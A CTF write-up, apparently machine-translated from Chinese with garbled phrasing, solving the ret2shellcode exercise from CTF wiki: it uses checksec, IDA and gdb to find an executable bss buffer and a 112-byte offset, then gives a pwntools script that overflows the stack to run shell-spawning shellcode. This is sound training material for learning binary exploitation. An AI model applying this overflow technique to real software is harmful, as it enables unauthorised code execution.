Learn PWN from CTF wiki - ret2shellcode

link : Configuration tool ,gdb,ida

ret2shellcode Answer key

checksec see ：

no canary= You can simply stack overflow

NX disabled = take shellcode Put in the data segment , Can execute

ida see ：

You can enter 100 Bytes , Copied to the buf2, Cannot overflow

original buf2 stay bss paragraph ,

bss paragraph ： Generally, it refers to uninitialized or initialized as 0 An area of memory for global and static variables , It is characterized by reading and writing , Before the program is executed ,bss Duan Qing 0

Can it be implemented

gdb debugging ：

gdb ret2shellcode
disas main
b main
r
vmmap

You can see 0804A080 This address is in the area selected above , Show rwxp You can read and write .

lea eax,[esp+0x1c]  
mov DWORD PTR [esp], eax 
#  You can know that the starting address of the string is different from esp by +0x1c

So distance ebp The address is 0x88-0x1c = 0x6C

Then the return address is overwritten ：

                             +-----------------+
                             |     /bin/sh     |   primary ret Return to position 
                             +-----------------+
                             |      holk       |   primary saved ebp Location （4 byte ）
                      ebp--->+-----------------+
                             |                 |
                             |                 |
                             |                 |
                             |                 |
                             |                 |
                             |                 |
             s start ,ebp-0x6C-->+-----------------+

0x6C+4 = 112（ Decimal system ） Bytes .

You know the number of overflow characters , Next look for system(/bin/sh)

Stack overflow problem , With the overflow character amount , With system(/bin/sh) That is to complete the topic , Unfortunately, Mu you …

It can be constructed by itself shellcode【system(/bin/sh)】

shellcode = asm(shellcraft.sh())
structure payload

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
sh.interactive()